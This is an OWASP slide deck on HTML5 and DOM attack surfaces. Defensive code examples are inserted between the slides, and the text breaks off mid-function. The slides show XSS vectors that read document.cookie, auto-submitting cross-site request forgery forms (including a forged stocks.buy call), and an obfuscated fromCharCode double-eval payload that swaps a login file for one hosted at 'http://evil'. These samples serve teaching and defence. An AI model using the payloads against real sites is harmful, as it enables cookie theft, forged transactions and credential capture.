  • 2. http://shreeraj.blogspot.com shreeraj@blueinfy.com Who Am I? http://www.blueinfy.com Founder & Director Blueinfy Solutions Pvt. Ltd. SecurityExposure.com Past experience Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev) Interest Web security research Published research Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. Advisories - .Net, Java servers etc. Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (Author) Web 2.0 Security – Defending Ajax, RIA and SOA Hacking Web Services Web Hacking OWASP 2
  • 3. Agenda Next Generation Application’s Attack Surface and Threat Model HTML 5 – Tags, Storage & WebSQL DOM – Vulnerabilities & Exploits Abusing Sockets, XHR & CSRF ClickJacking & Exploiting Rich HTML Components Reverse Engineering across DOM OWASP 3
  • 5. Real Life Cases Last three years – several applications reviewed (Banking, Trading, Portals, Web 2.0 sites etc…) Interesting outcomes and stats: auto scanning is becoming increasingly difficult, and impossible in some cases; sites are vulnerable and easily exploitable in many cases OWASP 5
  • 6. Technology Shift & Trend [diagram] Client side technologies: Mobile (Android, iPhone/iPad), HTML 5 (Storage, WebSocket, DOM, WebSQL, JS, XHR), Flash/Flex (AMF), Silverlight (XAML, WCF, .NET) and others. Client side components (browser): presentation layer, business layer, data access layer, authentication, communication etc. Server side components: runtime, platform, operating system. OWASP 6
  • 7. Browser Model [diagram] Presentation: Mobile, HTML5, Silverlight, Flash plug-in. Process & Logic: JavaScript, DOM/Events, Parser/Threads. Network & Access: WebSQL, Storage, XHR, WebSocket, Plug-in Sockets, Browser Native Network Services. Core Policies: Same Origin Policy (SOP), Sandbox. OWASP 7
  • 8. Layers
    Presentation – HTML5, Silverlight, Flash/Flex
    Process & Logic – JavaScript, Document Object Model (DOM - 3), Events, Parsers/Threads etc.
    Network & Access – XHR – Level 2, WebSockets, Plugin-Sockets
    Core Policies – SOP, Sandboxing for iframe, Shared Resources OWASP 8
  • 9. Application Architecture [diagram] End client browser stack (Ajax, RIA (Flash), HTML / JS / DOM) talks over the Internet to the web server, application server and web services, with a data-access layer in front of the database and an authentication server providing auth. access; example applications: Trading, Weather, Email, Banking, Blog. OWASP 9
  • 10. Attack Surface Expansion [diagram] Entry points into the client stack (Ajax, RIA (Flash), HTML / JS / DOM): HTTP variables (POST name and value pairs, QueryString, Cookie etc.), JSON/XML streams in HTTP responses, DOM calls/events, file attachments and uploads, API streams (Open APIs and Feeds) and other integrated third party information streams. OWASP 10
  • 11. AppSec dynamics [figure, source - OWASP] OWASP 11
  • 12. Integration and Communications DOM glues everything – it integrates Flex, Silverlight and HTML if needed. Various ways to communicate – the native browser way, using XHR, and WebSockets. Options for data sharing – JSON, XML, WCF, AMF etc. (many more). Browsers support a new set of technologies and expose the surface. OWASP 12
  • 13. Demos App using DOM, AJAX and Web Services; HTML 5 components and usage; fingerprinting application assets from the DOM or JavaScript – frameworks, scripts, structures, and so on – DWR/Struts OWASP 13
  • 14. Threat Model [diagram, threats mapped onto the browser layers]
    1. XSS abuse with tags and attributes (Events, Tags & Attributes, Thick Features – Presentation)
    2. DOM based XSS and redirects (Parser/Threads – Process & Logic)
    3. Stealing from the storage (DOM Storage)
    4. Injecting and exploiting WebSQL
    5. Abusing network API and sockets (XHR, WebSocket, Plug-in Sockets, Browser Native Network Services – Network & Access)
    6. CSRF across streams
    7. Sandbox attacks (Same Origin Policy (SOP), Sandbox – Core Policies)
    8. Abusing new features like drag-and-drop, and ClickJacking
    9. Threats to widgets and mashups
    10. Botnet/Spynet using WebWorkers OWASP 14
  • 15. Mapping top 10 – Current Context
    A1 – Injection: JSON, AMF, WCF, XML injection along with WebSQL.
    A2 – XSS: DOM based XSS, script injection through , direct third party streams, HTML5 tags
    A3 – Broken Authentication and Session Management: reverse engineering authentication/authorization logic (JS, Flash or Silverlight) & LocalStorage
    A4 – Insecure Direct Object References: insecure data access level calls from the browser.
    A5 – CSRF: CSRF with XML, JSON and AMF streams and XHR (SOP and sharing)
    A6 – Security Misconfiguration: insecure browsers, poor policies, trust model
    A7 – Failure to Restrict URL Access: hidden URLs and resource-fetching from reverse engineering
    A8 – Unvalidated Redirects: DOM-based redirects and spoofing
    A9 – Insecure Cryptographic Storage: local storage inside the browser and global variables
    A10 – Insufficient Transport Layer Protection: Ajax and other calls going over non-SSL channels.
    Mobile 10 … OWASP 15
  • 16. HTML 5 – TAGS, STORAGE & WEBSQL OWASP 16
  • 17. Abusing HTML 5 Tags
    Various new tags and attributes can be abused and may not be filtered or validated
    Media tags
      <video poster=javascript:alert(document.cookie)//
      <audio><source onerror="javascript:alert(document.cookie)">
    Form tags
      <form><button formaction="javascript:alert(document.cookie)">foo
      <body oninput=alert(document.cookie)><input autofocus> OWASP 17
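The attribute-level vectors on this slide are the ones an input filter written for HTML 4 tends to miss. The scanner below is an added example, not code from the slides or from Blueinfy: it flags every `on*` event-handler attribute and every script URL (`javascript:`, `vbscript:`, `data:text/html`) in a URL-bearing attribute such as `poster`, `formaction`, `src` or `href`, normalizing the value the way browsers do so that control characters inside the scheme do not slip past. The sample markup is constructed for the example.

```javascript
// Added example (not from the slides): flag HTML 5 attribute vectors in markup or templates.
// Attribute names that carry URLs and therefore accept a javascript: scheme.
const URL_ATTRS = new Set(['src', 'href', 'action', 'formaction', 'poster', 'data', 'xlink:href', 'background']);
// Tag name plus raw attribute text; the final ">" is optional so a truncated tag like
// "<video poster=javascript:..." (no closing bracket) is still examined.
const TAG_RE = /<([a-zA-Z][\w:-]*)([^>]*)>?/g;
// name, then optionally ="double", ='single' or bare value.
const ATTR_RE = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function attrValue(m) {
  // Whichever quoting style matched, or '' for a bare attribute such as "autofocus".
  if (m[2] !== undefined) return m[2];
  if (m[3] !== undefined) return m[3];
  if (m[4] !== undefined) return m[4];
  return '';
}

function isScriptUrl(value) {
  // Browsers drop ASCII control characters and whitespace inside the scheme, so
  // "java\tscript:" still executes; normalize the same way before matching.
  const v = value.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  return v.startsWith('javascript:') || v.startsWith('vbscript:') || v.startsWith('data:text/html');
}

// Returns one finding per dangerous attribute: { tag, attr, reason }.
function scanMarkup(html) {
  const findings = [];
  TAG_RE.lastIndex = 0;
  let tag;
  while ((tag = TAG_RE.exec(html)) !== null) {
    const tagName = tag[1].toLowerCase();
    ATTR_RE.lastIndex = 0;
    let attr;
    while ((attr = ATTR_RE.exec(tag[2])) !== null) {
      const name = attr[1].toLowerCase();
      if (name.startsWith('on')) {
        findings.push({ tag: tagName, attr: name, reason: 'event handler' });
      } else if (URL_ATTRS.has(name) && isScriptUrl(attrValue(attr))) {
        findings.push({ tag: tagName, attr: name, reason: 'script URL' });
      }
    }
  }
  return findings;
}

// Constructed samples: the four vectors from the slide and two benign uses of the same tags.
const SLIDE_VECTORS = [
  '<video poster=javascript:alert(document.cookie)//',
  '<audio><source onerror="javascript:alert(document.cookie)">',
  '<form><button formaction="javascript:alert(document.cookie)">foo',
  '<body oninput=alert(document.cookie)><input autofocus>',
];
const BENIGN = [
  '<video poster="/img/cover.png" controls src="/media/clip.mp4">',
  '<form action="/search"><button formaction="/search/advanced">go</button></form>',
];

// "tag@attr" per sample, one string per input; '' means nothing was flagged.
function summarize(samples) {
  return samples.map(s => scanMarkup(s).map(f => f.tag + '@' + f.attr).join(','));
}

console.log(summarize(SLIDE_VECTORS)); // one finding per vector
console.log(summarize(BENIGN));        // two empty strings
```

The scanner is a review aid for templates and stored markup, not a substitute for an allowlist-based sanitizer: it reports where a filter needs to act, and the normalization step is the part most home-grown filters forget.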
  • 18. Attacking Storage HTML 5 has local storage, which can hold globally scoped variables http://www.w3.org/TR/webstorage/ OWASP 18
  • 19. Attacking Storage They can be stolen through XSS via the JavaScript getItem and setItem calls: XSS the box and scan through the storage OWASP 19
  • 20. DOM Storage Applications run with a “rich” DOM. JavaScript sets several variables and parameters while loading – GLOBALS. They hold sensitive information; what if they are GLOBAL and remain for the life of the application? They can be retrieved with XSS. HTTP requests and responses go through JavaScript (XHR) – what about those vars? OWASP 20
  • 21. What is wrong? OWASP 21
  • 22. By default it's Global
    Here is the line of code
      temp = "login.do?user="+user+"&pwd="+pwd;
      xmlhttp.open("GET",temp,true);
      xmlhttp.onreadystatechange=function() OWASP 22
  • 23. DOM stealing It is possible to get these variables and clear text information – user/pass, responses and tokens, business information, XHR calls and HTTP requests/responses; dummy XHR object injection; lots of possibilities for exploitation OWASP 23
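The three lines on the "By default it's Global" slide leak in two places at once: `temp`, `user` and `pwd` are assigned without `var`, so they become properties of `window` that any later script (or an XSS payload) can read, and the password is put in the query string where it lands in history, proxy logs and `window.location`. The block below is an added example, not code from the slides or from Blueinfy: it reproduces the slide's call against a fake XHR, shows the scoped POST version, and includes a small audit that walks a window-like object for leftover secrets, which is the kind of check a DOM profiler performs. The endpoint `login.do`, the fake XHR and the sample credentials are assumed and constructed for the example.

```javascript
// Added example (not from the slides): global-scope credential leak and its fix, plus an audit.
function makeFakeXhr(log) {
  // Minimal stand-in for XMLHttpRequest that records what would go on the wire.
  return {
    headers: {},
    open(method, url) { this.method = method; this.url = url; },
    setRequestHeader(k, v) { this.headers[k] = v; },
    send(body) { log.push({ method: this.method, url: this.url, body }); },
    onreadystatechange: null,
  };
}

// As on the slide: temp, user and pwd are assigned without var, so in a browser they land on
// window and stay there for the life of the single-page application. globalObj stands in
// for window here.
function loginAsOnSlide(globalObj, xmlhttp, u, p) {
  globalObj.user = u;
  globalObj.pwd = p;
  globalObj.temp = "login.do?user=" + globalObj.user + "&pwd=" + globalObj.pwd;
  xmlhttp.open("GET", globalObj.temp, true);
  xmlhttp.onreadystatechange = function () {};
  xmlhttp.send(null);
}

// Hardened: everything is function-scoped, the password travels in a POST body rather than
// the URL (so it is not in window.location, history or proxy logs), and nothing is retained
// once send() returns.
function loginHardened(xmlhttp, u, p) {
  const body = new URLSearchParams({ user: u, pwd: p }).toString();
  xmlhttp.open("POST", "login.do", true);
  xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xmlhttp.onreadystatechange = function () {};
  xmlhttp.send(body);
}

// Names that deserve a second look when found on window or in localStorage.
const SENSITIVE_KEY = /pass|pwd|secret|token|session|auth|key|credit/i;

// Report global entries whose name looks sensitive or whose value contains a known secret.
function auditGlobals(globalObj, knownSecrets) {
  const hits = [];
  for (const key of Object.keys(globalObj)) {
    const value = globalObj[key];
    if (typeof value === 'function') continue;
    let text;
    try { text = JSON.stringify(value) || ''; } catch (e) { text = String(value); }
    const leaksSecret = (knownSecrets || []).some(s => s && text.includes(s));
    if (SENSITIVE_KEY.test(key) || leaksSecret) hits.push(key);
  }
  return hits;
}

// Runs both variants and returns what the audit and the wire recorder saw.
function demo() {
  const wire = [];
  const fakeWindow = {};
  loginAsOnSlide(fakeWindow, makeFakeXhr(wire), 'alice', 'S3cret!');
  const leaked = auditGlobals(fakeWindow, ['S3cret!']);   // ['pwd', 'temp']
  const cleanWindow = {};
  loginHardened(makeFakeXhr(wire), 'alice', 'S3cret!');
  const clean = auditGlobals(cleanWindow, ['S3cret!']);   // []
  return { leaked, clean, wire };
}

console.log(demo());
```

Running `auditGlobals(window, [])` from the console of a real single-page application, after a login, is a quick way to see which of the application's "GLOBALS" the slide warns about are still holding credentials or tokens.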
  • 24. Demo DOMTracer and profiling Accessing username and password OWASP 24
  • 25. SQL Injection WebSQL is part of the HTML 5 specification; it provides an SQL database inside the browser itself. It allows one-time data loading and offline browsing capabilities. It raises security concerns and creates potential injection points: injection through its methods and calls is possible OWASP 25
  • 26. SQL Injection Through JavaScript one can harvest the entire local database. Example OWASP 26
  • 27. DOM – VULNERABILITIES & EXPLOITS OWASP 27
  • 28. DOM Architecture OWASP 28
  • 29. DOM Calls [diagram] The client (HTML / CSS / RIA, JS / DOM) makes Ajax/Flash/Silverlight async calls through XMLHttpRequest (XHR), asynchronous over HTTP(S), to the web server, which fronts the database / resource, XML / middleware / text OWASP 29
  • 30. DOM Calls – stream formats: JSON, XML, JS-Script, JS-Object, JS-Array OWASP 30
  • 31. DOM based XSS It is a sleeping giant in Ajax applications. Root cause: the DOM is already loaded; the application is single page and the DOM remains the same; new information has to be injected using various DOM calls like eval(); and that information comes from untrusted sources OWASP 31
  • 32. Example cases There are various ways DOM based XSS can take place. Examples: a simple DOM function uses the URL to process Ajax calls; third party content goes into the existing DOM and the call is not secure; an Ajax call from the application – what if we make a direct call to the link? JSON may cause XSS OWASP 32
  • 33. DOM based URL parsing
    Ajax applications are already loaded and developers may be using a static function to pass arguments from the URL. For example
      hu = window.location.search.substring(1);
    The above parameter goes into the following Ajax function
      eval('getProduct('+ koko.toString()+')');
    DOM based XSS OWASP 33
  • 34. Demo Scanning with DOMScan Injecting payload in the call OWASP 34
  • 35. Third Party Streaming [diagram] Documents, news, weather, mails, bank/trade data and RSS feeds arrive over the Internet into the browser (Ajax, RIA (Flash/Silver), HTML / JS / DOM) and into the application infrastructure (web services end point, database, authentication); an attacker-controlled stream consumed with eval() ends in XSS OWASP 35
  • 36. Stream processing
      if (http.readyState == 4) {
        var response = http.responseText;
        var p = eval("(" + response + ")");
        document.open();
        document.write(p.firstName+"<br>");
        document.write(p.lastName+"<br>");
        document.write(p.phoneNumbers[0]);
        document.close();
      } OWASP 36
  • 37. Polluting Streams [diagram] XML / JS-Object / JS-Array / JS-Script / JSON streams from the web applications and their databases pass through the web server and an attacker's proxy on port 8008 on their way to the web client, where eval() turns the polluted stream into XSS OWASP 37
  • 38. Exploiting DOM calls – examples of vulnerable calls
      document.write(…)
      document.writeln(…)
      document.body.innerHTML=…
      document.forms[0].action=…
      document.attachEvent(…)
      document.create…(…)
      document.execCommand(…)
      document.body. …
      window.attachEvent(…)
      document.location=…
      document.location.hostname=…
      document.location.replace(…)
      document.location.assign(…)
      document.URL=…
      window.navigate(…) OWASP 38
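Both the "DOM based URL parsing" slide (URL text concatenated into `eval('getProduct(...)')`) and the "Stream processing" slide (`eval("(" + response + ")")` followed by `document.write`) have the same root cause: untrusted text is executed rather than parsed. The block below is an added example, not code from the slides or from Blueinfy, showing the two calls rewritten so the URL parameter is validated as a whole before it reaches a fixed function, and the response is parsed with `JSON.parse()` and HTML-escaped before it is written. `getProduct()` is a constructed stand-in for the application's function; the sample inputs are constructed.

```javascript
// Added example (not from the slides): parse untrusted input as data, never as code.

// Stand-in for the application's product lookup (assumed for the example).
function getProduct(id) {
  return { id, name: 'product-' + id };
}

// Vulnerable shape from the slide, shown for contrast and never called here:
//   hu = window.location.search.substring(1);
//   eval('getProduct(' + hu + ')');   // a query string that closes the call and appends code runs as JavaScript

function safeDecode(s) {
  // decodeURIComponent throws on a malformed % sequence; keep the raw text in that case.
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

// "?id=3&x=y" -> { id: '3', x: 'y' } without touching eval().
function parseQuery(search) {
  const params = {};
  const qs = search.startsWith('?') ? search.slice(1) : search;
  for (const pair of qs.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const k = eq < 0 ? pair : pair.slice(0, eq);
    const v = eq < 0 ? '' : pair.slice(eq + 1);
    params[safeDecode(k)] = safeDecode(v);
  }
  return params;
}

function dispatchProduct(search) {
  const id = parseQuery(search).id;
  // parseInt('3);alert(1)', 10) would happily return 3, so match the whole value instead.
  if (typeof id !== 'string' || !/^\d{1,9}$/.test(id)) {
    throw new Error('invalid product id');
  }
  return getProduct(Number(id));  // the call target is fixed; only a validated argument varies
}

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Replacement for the slide's readyState == 4 handler: JSON.parse() rejects anything that is
// not data (a script body in the stream is a parse error, not an execution), and every field
// is escaped before it becomes markup. Returns the HTML fragment, or null for bad input.
function renderContact(responseText) {
  let p;
  try { p = JSON.parse(responseText); } catch (e) { return null; }
  if (p === null || typeof p !== 'object') return null;
  const phone = Array.isArray(p.phoneNumbers) ? p.phoneNumbers[0] : '';
  return [p.firstName, p.lastName, phone]
    .map(v => escapeHtml(v == null ? '' : v) + '<br>')
    .join('');
}

// Constructed inputs: a normal product call, a normal contact record, and a polluted stream.
console.log(dispatchProduct('?id=3'));
console.log(renderContact('{"firstName":"Ann","lastName":"Lee","phoneNumbers":["555-0100"]}'));
console.log(renderContact('alert(document.cookie)'));   // null: not JSON, nothing runs
```

In a real page the escaped fragment would still be assigned with `textContent` per field rather than written as one HTML string; the string form is used here only so the result can be inspected without a DOM.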
  • 39. Demo Sample call demo DOMScan to identify vulnerability OWASP 39
  • 40. Direct Ajax Call The Ajax function makes a back-end call. The back-end returns a JSON stream (or another type) that gets injected into the DOM. In some libraries the content type allows the stream to be loaded in the browser directly, in that case bypassing DOM processing… OWASP 40
  • 41. Demo DWR/JSON call – bypassing and direct stream access OWASP 41
  • 42. ABUSING SOCKETS, XHR & CSRF OWASP 42
  • 43. Abusing network calls HTML 5 provides WebSocket and XHR Level 2 calls. They allow cross-domain calls and raw socket capabilities. This can be leveraged by a JavaScript payload; malware or a worm can use it to perform several scanning tasks OWASP 43
  • 44. Internal Scanning Allows internal scanning, setting up a backward hidden channel, and opening calls to a proxy/cache. Some browsers have blocked these calls for security reasons. OWASP 44
  • 45. XHR/CSRF ETC. OWASP 45
  • 46. XHR – Level 2 calls XHR is now at level 2 in browsers. Behaviour differs between browsers. XHR is already implemented. The shared resource policy is implemented with the “Origin” and “Access-Control-*” headers and decisions are based on them. Potential abuses: one way stealth channel; CSRF possible (no cookie though); header changes. CORS - http://www.w3.org/TR/cors/ (Cross-Origin Resource Sharing) OWASP 46
  • 47. CSRF CSRF is possible with Web 2.0 streams by abusing DOM calls: XML manipulation, CSRF with JSON; AMFX is also an XML stream. The attacker injects a simple HTML payload and initiates a request from the browser to the target cross domain OWASP 47
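The "Origin" and "Access-Control-*" headers the slide mentions are decided on the server, and the decision is where XHR Level 2 deployments go wrong: reflecting whatever `Origin` arrives while allowing credentials turns an authenticated API into something any site can read. The block below is an added example in Node.js style, not code from the slides or from Blueinfy, placing that misconfiguration beside an allowlist version and a preflight handler. The vetted origin list and the request headers are assumed and constructed for the example.

```javascript
// Added example (not from the slides): server-side CORS decision, weak and corrected forms.
const ALLOWED_ORIGINS = new Set(['https://app.example.com', 'https://admin.example.com']);

// Weak setting: echo the request's Origin and allow credentials. Any site can then read the
// authenticated response through XHR Level 2, which is the cross-domain read the slide warns about.
function corsHeadersReflecting(requestHeaders) {
  const origin = requestHeaders['origin'];
  if (!origin) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Corrected: only a vetted origin is echoed; "null" (sandboxed iframes, file:// pages,
// some redirects) is never trusted; Vary: Origin stops caches from serving one origin's
// answer to another; "*" is never combined with credentials.
function corsHeaders(requestHeaders, allowCredentials) {
  const origin = requestHeaders['origin'];
  if (!origin || origin === 'null' || !ALLOWED_ORIGINS.has(origin)) {
    return {};   // no Access-Control-* headers: the browser withholds the response body
  }
  const headers = {
    'Access-Control-Allow-Origin': origin,
    'Vary': 'Origin',
    'Access-Control-Allow-Methods': 'GET, POST',
    'Access-Control-Allow-Headers': 'Content-Type, X-Requested-With',
    'Access-Control-Max-Age': '600',
  };
  if (allowCredentials) headers['Access-Control-Allow-Credentials'] = 'true';
  return headers;
}

// Preflight and actual-request handling for a credentialed JSON endpoint: returns the
// status and headers the framework should emit before running the endpoint logic.
function handleCors(method, requestHeaders) {
  const headers = corsHeaders(requestHeaders, true);
  if (method === 'OPTIONS') {
    // Preflight carries no body; 204 when the origin is vetted, 403 otherwise.
    return { status: Object.keys(headers).length ? 204 : 403, headers };
  }
  return { status: 200, headers };
}

// Constructed requests: the application's own front end and an unrelated site.
console.log(handleCors('OPTIONS', { origin: 'https://app.example.com' }));
console.log(handleCors('OPTIONS', { origin: 'https://unrelated.example' }));
console.log(corsHeadersReflecting({ origin: 'https://unrelated.example' })); // the weak form says yes to anyone
```

A request without an `Origin` header is same-origin or non-browser traffic, so the corrected function adds nothing for it; the cookie-less CSRF case the slide notes is the reason the credentials flag is a separate decision from the origin check.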
  • 48. How it works? OWASP 48
  • 49. JSON
    <html>
    <body>
    <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101/json/jservice.ashx" METHOD="POST">
    <input type="hidden" name='{"id":3,"method":"getProduct","params":{ "id" : 3}}' value='foo'>
    </FORM>
    <script>document.buy.submit();</script>
    </body>
    </html> OWASP 49
  • 50. HTTP Req.
    POST /json/jservice.ashx HTTP/1.1
    Host: 192.168.100.2
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    Connection: keep-alive
    Content-Type: text/plain
    Content-Length: 57

    {"id":3,"method":"getProduct","params":{ "id" : 3}}=foo OWASP 50
  • 51. HTTP Resp.
    HTTP/1.1 200 OK
    Date: Sat, 17 Jul 2010 09:14:44 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Cache-Control: no-cache
    Pragma: no-cache
    Expires: -1
    Content-Type: text/plain; charset=utf-8
    Content-Length: 1135

    {"id":3,"result":{"Products":{"columns":["product_id","product_name","product_desc_summary","product_desc","product_price","image_path","rebates_file"],"rows":[[3,"Doctor Zhivago","Drama / Romance","David Lean's DOCTOR ZHIVAGO is an exploration of the Russian Revolution as seen from the point of view of the intellectual, introspective title character (Omar Sharif). As the political landscape changes, and the Czarist regime comes to an end, Dr. Zhivago's relationships reflect the political turmoil raging about him. Though he is married, the vagaries of war lead him to begin a love affair with the beautiful Lara (Julie Christie). But he cannot escape the machinations of a band of selfish and cruel characters: General Strelnikov (Tom Courtenay), a Bolshevik General; Komarovsky (Rod Steiger), Lara's former lover; and Yevgraf (Alec Guinness), Zhivago's sinister half-brother. This epic, sweeping romance, told in flashback, captures the lushness of Moscow before the war and the violent social upheaval that followed. The film is based on the Pulitzer Prize-winning novel by Boris Pasternak.",10.99,"zhivago","zhivago.html"]]}}} OWASP 51
  • 52. AMF
    <html>
    <body>
    <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101:8080/samples/messagebroker/http" METHOD="POST">
    <input type="hidden" name='<amfx ver' value='"3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null/><string/><string/><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>68AFD7CE-BFE2-4881-E6FD-694A0148122B</string><int>5</int><int>0</int><int>0</int></object></body></amfx>'>
    </FORM>
    <script>document.buy.submit();</script>
    </body>
    </html> OWASP 52
  • 53. XML
    <html>
    <body>
    <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
    <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
    </FORM>
    <script>document.buy.submit();</script>
    </body>
    </html> OWASP 53
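All three forms on the JSON, AMF and XML slides rely on the same trick: `ENCTYPE="text/plain"` lets a plain HTML form deliver a body the endpoint will parse as JSON-RPC, AMFX or XML-RPC, while the browser attaches the victim's cookies. A form cannot choose any other content type and cannot add custom headers, which is what the server-side check below relies on. It is an added example, not code from the slides or from Blueinfy: the endpoint insists on its real content type, compares `Origin` (or the `Referer` origin) with the site, and requires a per-session token in a custom header. The request objects, site origin and token are constructed, modelled on the "HTTP Req." slide.

```javascript
// Added example (not from the slides): server-side CSRF checks for JSON/AMF/XML-RPC endpoints.
const SITE_ORIGIN = 'https://trade.example.com';   // assumed site origin
// Types the endpoints on the slides actually speak; text/plain is deliberately absent.
const API_CONTENT_TYPES = new Set(['application/json', 'text/xml', 'application/xml', 'application/x-amf']);
// The only encodings an HTML form can produce.
const FORM_TYPES = new Set(['text/plain', 'application/x-www-form-urlencoded', 'multipart/form-data']);

function originOf(url) {
  try { return new URL(url).origin; } catch (e) { return null; }
}

// Returns { ok, reason }; the endpoint logic runs only when ok is true.
function csrfCheck(req) {
  const h = req.headers;
  const type = (h['content-type'] || '').split(';')[0].trim().toLowerCase();
  if (FORM_TYPES.has(type) || !API_CONTENT_TYPES.has(type)) {
    return { ok: false, reason: 'content type "' + (type || 'none') + '" not accepted on API endpoint' };
  }
  // Browsers send Origin on cross-site POSTs (and Referer unless suppressed); require a match.
  const origin = h['origin'] || (h['referer'] ? originOf(h['referer']) : null);
  if (origin !== SITE_ORIGIN) {
    return { ok: false, reason: 'origin "' + (origin || 'none') + '" is not ' + SITE_ORIGIN };
  }
  // Per-session token in a custom header: a cross-site form cannot set it.
  if (!req.session || !req.session.csrfToken || h['x-csrf-token'] !== req.session.csrfToken) {
    return { ok: false, reason: 'missing or mismatched CSRF token' };
  }
  return { ok: true, reason: 'accepted' };
}

// Constructed request modelled on the "HTTP Req." slide: a text/plain form post whose field
// name carries the JSON-RPC body, sent with the victim's session.
const FORGED_REQUEST = {
  method: 'POST', path: '/json/jservice.ashx',
  headers: { 'content-type': 'text/plain', 'content-length': '57', referer: 'https://other-site.example/page.html' },
  body: '{"id":3,"method":"getProduct","params":{ "id" : 3}}=foo',
  session: { csrfToken: 'tok-0123' },
};

// The same call issued by the application's own XHR from its own origin.
const LEGIT_REQUEST = {
  method: 'POST', path: '/json/jservice.ashx',
  headers: { 'content-type': 'application/json; charset=utf-8', origin: SITE_ORIGIN, 'x-csrf-token': 'tok-0123' },
  body: '{"id":3,"method":"getProduct","params":{"id":3}}',
  session: { csrfToken: 'tok-0123' },
};

console.log(csrfCheck(FORGED_REQUEST));   // rejected on content type before anything else
console.log(csrfCheck(LEGIT_REQUEST));    // accepted
```

The content-type check alone already defeats the forms on the slides; the origin comparison and the token are kept because a permissive CORS policy on the same endpoint would otherwise let a cross-site XHR send the right content type.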
  • 54. Demos Simple trade demo – XML-RPC call CSRF. OWASP 54
  • 55. FLASHJACKING OWASP 55
  • 56. Flashjacking
    It is possible to have integrated attacks combining DOM based XSS, CSRF and Flash
    A DOM based issue can change the flash/swf file – it can be swapped at run time – and the user will not come to know ..
    Example
      document.getElementsByName("login").item(0).src = "http://evil/login.swf" OWASP 56
  • 57. Double eval – eval the eval
    Payload - document.getElementsByName('Login').item(0).src='http://192.168.100.200:8080/flex/Loginn/Loginn.swf'
    Converting to a double eval to inject ' and " etc…
      eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,109,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,47,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103,105,110,110,46,115,119,102,39)) OWASP 57
  • 58. Silverlightjacking
    It is possible to have integrated attacks combining DOM based XSS, CSRF and Silverlight files
    A DOM based issue can change the xap file – it can be swapped at run time – and the user will not come to know ..
    Example
      document.getElementsByName("login").item(0).src = "http://evil/login.xap" OWASP 58
  • 60. Widgets Widgets/Gadgets/Modules – popular with Web 2.0 applications. Small programs that run inside the browser; JavaScript and HTML based components. In some cases they share the same DOM – yes, the same DOM. That creates cross widget channels. Exploitable … OWASP 60
  • 61. Cross DOM Access [diagram] Widget 1, Widget 2 and Widget 3 (an Email Widget and an RSS Feed Reader among them) all live in one shared DOM; the attacker's widget sets the trap there OWASP 61
  • 62. DOM traps It is possible to access DOM events, variables, logic etc. across widgets. A sandbox is required at the architecture layer to protect against cross widget access. Segregating the DOM by iframe may help. Flash based widgets have their own issues as well. Code analysis of widgets before allowing them to load OWASP 62
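"Segregating DOM by iframe" only helps if the widget really gets a different origin and the host page treats what comes back from it as untrusted. The block below is an added example, not code from the slides or from Blueinfy: the widget is loaded in a sandboxed iframe on its own origin, and the host accepts only origin-checked, shape-checked `postMessage()` traffic from it. The host-side handler is a pure function so it runs without a browser; the widget origin, the message format (`{type, payload}`) and the sample events are assumed and constructed for the example.

```javascript
// Added example (not from the slides): host-side handling of messages from an isolated widget.
//
// Host page markup, for reference:
//   <iframe id="rss" sandbox="allow-scripts allow-same-origin"
//           src="https://widgets.example.net/rss-reader.html"></iframe>
// The widget is served from a different origin, so the same origin policy already keeps it
// out of the host DOM, cookies and storage; the sandbox additionally removes forms, popups,
// top navigation and plugins. allow-same-origin is safe here only because the origin differs:
// on a same-origin frame it would let the widget script remove its own sandbox attribute.

const WIDGET_ORIGINS = new Set(['https://widgets.example.net']);   // assumed widget origin
const MAX_TITLES = 50;
const MAX_HEIGHT = 2000;

// event mirrors the MessageEvent a "message" listener receives: { origin, data }.
function handleWidgetMessage(event) {
  // 1. Origin check: messages from any other origin (including "null") are ignored.
  if (!WIDGET_ORIGINS.has(event.origin)) {
    return { accepted: false, reason: 'untrusted origin ' + String(event.origin) };
  }
  // 2. The payload is untrusted input even from a trusted origin: validate type and shape,
  //    and never pass it to eval() or innerHTML.
  const msg = event.data;
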